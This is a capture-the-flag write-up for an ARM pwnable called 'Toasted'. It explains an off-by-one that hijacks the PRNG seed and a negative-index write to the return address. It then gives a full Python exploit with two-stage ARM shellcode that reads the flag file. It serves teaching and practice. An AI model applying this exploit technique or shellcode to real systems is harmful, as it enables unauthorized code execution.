Description

Toasted is a statically linked 32-bit ARM pwnable running in qemu-user provided by the challenge creator. The main function is easy to read and produces the following pseudo-code:

/*
 * Decompiled entry point of the toaster service (decompiler pseudo-code, not
 * compilable C).
 *
 * Flow: read a 4-byte canary from /dev/urandom, ask for the passphrase via
 * checkpass(), read a 4-byte PRNG seed from the same descriptor, then run the
 * toasting loop in handle_bread() on the 256-byte ctxt buffer.
 *
 * Passing any command-line argument (argc > 1) enables the debug flag that is
 * forwarded to handle_bread().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int argc_; // ST04_4@1
  int urand_open_flags; // r2@1
  int seed; // [sp+8h] [bp+8h]@3
  int enable_debug; // [sp+Ch] [bp+Ch]@1
  char ctxt[256]; // [sp+10h] [bp+10h]@1
  // stackbuf (32 bytes at sp+110h) is immediately followed by urandom_fd at
  // sp+130h, so a one-byte write past stackbuf lands on the low byte of the fd.
  char stackbuf[32]; // [sp+110h] [bp+110h]@3
  int urandom_fd; // [sp+130h] [bp+130h]@3
  int _canary; // [sp+134h] [bp+134h]@3

  argc_ = argc;
  enable_debug = 0;
  setvbuf(stdout, 0, 2, 0);
  memset(ctxt, 0, 0x100);
  if ( argc_ > 1 )
  {
    // NOTE(review): urand_open_flags is only assigned on this path, yet it is
    // passed to open() unconditionally below. Presumably a decompiler artifact
    // (whatever happens to be in r2) rather than a meaningful argument - confirm.
    urand_open_flags = 1;
    enable_debug = 1;
  }
  urandom_fd = (int)open("/dev/urandom", 0, urand_open_flags);
  // The global canary is 4 random bytes; each function keeps a local copy and
  // compares it against the global before returning.
  read(urandom_fd, &gcanary, 4);
  _canary = gcanary;
  puts("Welcome to Internet of Toaster!\nFeaturing \"Random Heat Distribution\" (patent pending)");
  // checkpass() writes into stackbuf; see the layout note above.
  checkpass(stackbuf);
  printf("This next-gen toaster allows for %d slices of bread !\n", 256);
  puts("It also has a small tank of replacement bread if you burn one, which is a huge improvement over the netbsd-based models!");
  // The seed is read from urandom_fd *after* checkpass() has run, so it comes
  // from whatever descriptor number urandom_fd holds at this point.
  read(urandom_fd, &seed, 4);
  srandom(seed);
  handle_bread(ctxt, enable_debug);
  puts("Well, you've had your toasting frenzy!\nCheers");
  if ( _canary != gcanary )
    exit(-1);
  return 0;
}

The char ctxt[256] stack buffer will become very important later on. The program opens "/dev/urandom" and reads out 4 bytes, used as a random stack canary. Once this is done, main calls into checkpass:

/*
 * Decompiled passphrase check (decompiler pseudo-code).
 *
 * Reads up to 0x20 bytes from stdin into pwd, NUL-terminates the input at
 * index read_len, and compares it with the global gpassw. Exits the process on
 * a read error, a wrong passphrase, or a canary mismatch; otherwise prints
 * "Access granted!" and returns the result of puts().
 *
 * pwd: caller-supplied buffer; main() passes its 32-byte stackbuf.
 */
int __fastcall checkpass(char *pwd)
{
  char *_pwd; // [sp+4h] [bp+4h]@1
  int _canary; // [sp+8h] [bp+8h]@1
  int read_len; // [sp+Ch] [bp+Ch]@1

  _pwd = pwd;
  _canary = gcanary;
  printf("Passphrase : ");
  read_len = read(0, _pwd, 0x20);
  if ( read_len < 0 )
    exit(-1);
  // Off-by-one: when read() returns the full 0x20 bytes, this stores the NUL at
  // index 0x20, one byte past the end of the 32-byte buffer passed by main().
  _pwd[read_len] = 0;
  // strcmp stops at the first NUL, so an embedded "\x00" in the input ends the
  // compared string even though more bytes were read.
  if ( strcmp(gpassw, _pwd) )
  {
    puts("Access denied!\nNo toast today :-(");
    exit(-1);
  }
  // Only this function's local canary copy is checked here; note the exit
  // status is 0 on mismatch, unlike the -1 used elsewhere.
  if ( _canary != gcanary )
    exit(0);
  return puts("Access granted!");
}

There is an obvious off-by-1 error happening: _pwd[read_len] = 0;

The _pwd buffer is only 0x20 bytes long. If we send 0x20 bytes, this function will write a \x00 byte at the 33rd array position (index 0x20), one byte past the end of the buffer. We can exploit this to overwrite the file descriptor stored on the stack for urandom:

  char stackbuf[32]; // [sp+110h] [bp+110h]@3
  int urandom_fd; // [sp+130h] [bp+130h]@3

More accurately, we can overwrite only the lowest byte of the file descriptor integer, but this is enough to change the file descriptor to 0 because the upper bytes are already zero. Thus, we replace urandom with stdin, neat.

The main function reads out 4 bytes from the urandom (now stdin) file descriptor, and uses this value as a seed for the libc pseudo random number generator. Thus we can control the seed and the resulting sequence of PRNG outputs, which will be important later on.

The remainder of the application logic relevant to our interests can be found in the handle_bread function. Pseudo-code for this function:

/*
 * Decompiled toasting loop (decompiler pseudo-code).
 *
 * Repeatedly asks for a slice index, adds the next rand() byte to
 * ctxt[index], and resets the slice to 0 (counting an "overheat") when the sum
 * exceeds the limit. The loop ends after 260 counted iterations (i <= 259),
 * when the global overheat counter reaches 4, or when the input starts with
 * 'q' or 'x'.
 *
 * ctxt: slice buffer; main() passes its 256-byte ctxt array.
 * flag: when non-zero, the bread status is printed before every prompt.
 */
unsigned int __fastcall handle_bread(char *ctxt, int flag)
{
  unsigned int r; // r0@3
  int current_slice; // r4@10
  int _flag; // [sp+0h] [bp+0h]@1
  char *_ctxt; // [sp+4h] [bp+4h]@1
  int slice_num_signed; // [sp+Ch] [bp+Ch]@8
  char slice; // [sp+10h] [bp+10h]@6
  unsigned int new_slice_value; // [sp+14h] [bp+14h]@10
  int canary; // [sp+18h] [bp+18h]@1
  int i; // [sp+1Ch] [bp+1Ch]@1

  _ctxt = ctxt;
  _flag = flag;
  i = 0;
  canary = gcanary;
  do
  {
    // Early return: as shown, this path does not reach the canary comparison
    // at the bottom of the function.
    if ( overheat == 4 )
      return puts("The bread reserve tank is empty... Quitting");
    if ( _flag )
    {
      puts("Bread status: ");
      show_bread(_ctxt);
    }
    puts("Which slice do you want to heat?");
    // slice is typed as a single char by the decompiler, but 4 bytes are read
    // into it; the stack annotations place the next local 4 bytes later
    // (sp+14h), so it is presumably a 4-byte input buffer - confirm.
    r = read(0, &slice, 4);
    // Early return on 'q'/'x': as shown, this also skips the canary comparison.
    if ( slice == 'q' || slice == 'x' )
      return r;
    r = _isoc99_sscanf(&slice, "%d", &slice_num_signed);
    // Only the upper bound is checked; the index is signed, so negative values
    // pass and address memory below ctxt.
    if ( r && slice_num_signed <= 255 )
    {
      printf("Toasting %d!\n", slice_num_signed);
      current_slice = (unsigned __int8)_ctxt[slice_num_signed];
      r = rand();
      // Only the low byte of rand() is added to the current slice value.
      new_slice_value = current_slice + (int8)r;
      // The limit as shown is 256, not 255: a sum of exactly 256 is accepted
      // and stored into a char element below.
      if (new_slice_value <= 256)
      {
        _ctxt[slice_num_signed] = new_slice_value;
      }
      else
      {
        r = puts("Detected bread overheat, replacing");
        _ctxt[slice_num_signed] = 0;
        ++overheat;
      }
      // i counts only iterations whose input parsed and passed the bound check.
      ++i;
    }
  }
  while ( i <= 259 );
  if ( canary != gcanary )
    exit(-1);
  return r;
}

To summarize:

  • Read user input (integer string), convert to signed integer using scanf.
  • Set r = rand().
  • Set _ctxt[index] += r.
  • If _ctxt[index] > 0xff, set _ctxt[index] = 0 and increase the overheat counter by one.
  • If overheat == 4 or number of iterations > 259, exit.

Since we control the rand() seed, we know the output of rand() beforehand. By using the correct indices for the correct PRNG bytes, we can set the contents of the _ctxt buffer on the stack to whatever we want (e.g. shellcode). Additionally, the user-provided index is converted to a signed integer but never checked for >= 0, which means we can provide negative indices to overwrite the return address as well as the integer i to give us more PRNG iterations.

Battle-plan:

  1. Choose a good seed that can give us all the bytes we need in only a few iterations.
  2. Write bytes at correct offsets in the _ctxt buffer to place shellcode onto the buffer.
  3. Overwrite the return address to jump to the stack buffer.

Even though the binary does not declare an executable stack, ARM QEMU is kind enough to execute the stack anyway (sorry, creator of the challenge!). So we don't need to ROP and can simply load shellcode to do what we want. During our tests we could not find a proper seed for the large shellcode we had, so we wrote a 2-stage shellcode instead. The first one calls read() again to load more code, which finally reads out the flag file and writes it to standard output.

The exploit code:

#!/usr/bin/env python
# @skusec, @naehrwert

from Pwn import *

import os
import sys
import re
import struct
import ctypes

# Exploit setup: stack offsets, connection, both shellcode stages and the
# tables ("puzzle" and garbage slots) consumed by the toasting loop below.
# All offsets are relative to the _ctxt pointer used by handle_bread; negative
# indices are accepted because only the upper bound is checked there.

# _ctxt[-36] points to the loop counter i of handle_bread.
SLOT_I = -36

# _ctxt[-20] points to the saved return address of handle_bread.
SLOT_LR = -20

# Load the local libc so we can replay srand/rand with the seed we send.
# NOTE(review): this assumes the local rand() sequence matches the target's
# for the same seed - confirm when running on a different libc.
libc = ctypes.cdll.LoadLibrary('libc.so.6')

s = Socket()
s.connect('toasted.insomnihack.ch', 7200)

# Stage 2: open("/flag"); read(); write(); ARM shellcode.
# Given as space-separated hex bytes and converted to a byte string.
shellcode_2 = '05 70 A0 E3 2C 00 9F E5 00 10 A0 E3 01 20 A0 E3 00 00 00 EF 03 70 A0 E3 1C 10 9F E5 10 20 A0 E3 00 00 00 EF 04 70 A0 E3 00 00 A0 E3 08 10 9F E5 10 20 A0 E3 00 00 00 EF 98 ED FF F6 9E ED FF F6 2F 66 6C 61 67 00'
shellcode_2 = map(lambda x: chr(int(x, 16)), shellcode_2.split(' '))
shellcode_2 = ''.join(shellcode_2)

# Stage 1: read() THUMB ARM shellcode to load more shellcode.
# Kept as a list of single characters (not joined) because it is indexed
# byte by byte when building the puzzle.
shellcode = 'E1 BF 03 27 00 20 02 49 60 22 00 DF 00 48 80 47 58 ED FF F6'
shellcode = map(lambda x: chr(int(x,16)), shellcode.split(' '))

# Build the shellcode puzzle: one entry per byte we must place, holding the
# target offset in _ctxt, the byte value that rand() has to produce, and
# whether it has been placed yet. 0-bytes are skipped, as _ctxt is memsetted
# to zero anyway.
shellcode_puzzle = []
for i in xrange(len(shellcode)):
    if shellcode[i] != '\x00':
        shellcode_puzzle.append({'offset': i, 'value': shellcode[i], 'completed': False})

# Additionally, we need to change LR on the stack.
# STACK is the address we want to return to (documentation only; the bytes
# below are spelled out by hand).
STACK = 0xf6fffcb8

# Change return address to THUMB mode (odd address).
# Toasting ADDS the rand() byte to the byte already in memory, so each value is
# "target byte - existing byte". The subtracted constants (0x93, 0x8c, 0x00,
# 0x00) are presumably the bytes of the original saved return address - confirm.
shellcode_puzzle.append({'offset': SLOT_LR + 0, 'value': chr(((0xb8 | 1) - 0x93) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 1, 'value': chr((0xfc - 0x8c) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 2, 'value': chr((0xff - 0x00) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 3, 'value': chr((0xf6 - 0x00) & 0xff), 'completed': False})

# We can use these indices to place garbage bytes that we don't need.
# 'value' tracks the running sum we have added to each slot so we can tell
# when another addition would overheat it. Two ranges are used: the tail of
# _ctxt behind the shellcode, and negative indices -700..-341.
overheat_map = []
for i in xrange(len(shellcode) + 5, 0x100):
    overheat_map.append({'offset': i, 'value': 0})
for i in xrange(-700, -340):
    overheat_map.append({'offset': i, 'value': 0})

# Send password and override urandom fd.
# The payload is exactly 32 (0x20) bytes: 30 passphrase characters, "\n" and a
# NUL. The NUL ends the string for strcmp, and the full-length read makes
# checkpass write its terminator one byte past the 32-byte buffer.
s.readuntil('Passphrase :')
s.sendall('How Large Is A Stack Of Toast?\n\x00')

# Send PRNG seed. Aren't we sneaky.
# Found this through trial and error.
# I am massively disappointed by 0xdeadbeef.
# The seed goes out as 4 little-endian bytes (what main reads from the
# hijacked descriptor) and the same seed is applied to the local generator.
SEED=383611110
s.sendall(struct.pack('<I', SEED))
libc.srand(SEED)

# Do the toasting game....
# num_iterations counts toasts since the last reset of the remote counter i;
# num_overflows counts the overheats we have caused (the target quits at 4).
# NOTE(review): current_garbage_slot and did_the_thing are never read below.
current_garbage_slot = len(shellcode) + 1
num_iterations = 0
num_iterations_total = 0
num_overflows = 0
did_the_thing = False

# One loop pass == one toast on the target == one rand() output consumed on
# both sides. Keep going until every puzzle byte has been placed.
while any(map(lambda item: not item['completed'], shellcode_puzzle)):
    # Get next PRNG output, and check its usefulness.
    r = libc.rand() & 0xff
    rc = chr(r)

    # Check if we need this: take the first unplaced puzzle entry whose
    # required byte equals this PRNG byte.
    # NOTE(review): -1 doubles as the "no match" marker, so a puzzle entry at
    # offset -1 would not be recognised; none is defined here.
    offset = -1
    for item in shellcode_puzzle:
        if item['value'] == rc and not item['completed']:
            offset = item['offset']
            item['completed'] = True
            break

    if offset == -1:
        # We definitely do not need this byte.
        # Maybe we should reset the counter: after 255 toasts, aim this byte at
        # the remote loop counter i instead. r >= 2 presumably ensures the sum
        # exceeds the target's limit so the byte is zeroed via an overheat,
        # which is why it is counted in num_overflows - confirm.
        if num_iterations == 255 and num_overflows < 3 and r >= 2:
            num_overflows += 1
            slot = SLOT_I
            num_iterations = 0
        else:
            slot = -1
            # Find the best garbage slot: the first one that can absorb this
            # byte without its running sum reaching 0x100.
            for item in overheat_map:
                if r + item['value'] < 0x100:
                    slot = item['offset']
                    item['value'] += r
                    break

            # No slot found? We need to overflow.
            if slot == -1:
                if num_overflows < 3:
                    # Could not find a good garbage slot without overheating,
                    # so now we WILL overheat. Find the largest one to overheat.
                    max_item = None
                    max_value = 0
                    for item in overheat_map:
                        if item['value'] > max_value:
                            max_value = item['value']
                            max_item = item

                    # The target resets an overheated slice to 0; mirror that.
                    max_item['value'] = 0
                    slot = max_item['offset']
                    num_overflows += 1
                else:
                    assert False, 'too many overheats..'
    else:
        # We do need this byte for our shellcode / return address.
        slot = offset

    # Send slot.
    # The index is padded to at least 4 characters, matching the 4-byte read
    # the target performs per prompt.
    s.readuntil('heat?\n').strip()
    print('Setting slot %d to byte %02x' % (slot, r))
    s.sendall(('%d\n' % (slot)).ljust(4, ' '))
    s.readuntil('Toasting').strip()
    s.readuntil('\n')

    num_iterations += 1
    num_iterations_total += 1
    print('Num iterations: %d (total: %d)' % (num_iterations, num_iterations_total))
    print('Num remaining: %d' %  (len(filter(lambda item: not item['completed'], shellcode_puzzle))))


# 'q' makes handle_bread return, which jumps to the return address we rewrote.
s.sendall('q\n')
raw_input('Enter to send stage 2 shellcode..')
# Stage 2 is padded to 0x60 bytes, presumably the length stage 1 requests in
# its read() call - confirm against the stage 1 bytes.
s.sendall(shellcode_2.ljust(0x60, '\x00'))
raw_input('Lets see what this button does..')
print s.recv(1024)

Output: INS{_-n0_pa1n_n0qemu: uncaught target signal 4 (Illegal instruction) - core dumped

Our shellcode only reads 0x10 bytes from the flag file (smart, right?), so we didn't get the complete flag, but it's not hard to guess what the rest should be: INS{_-n0_pa1n_n0_ga1n-_} :-)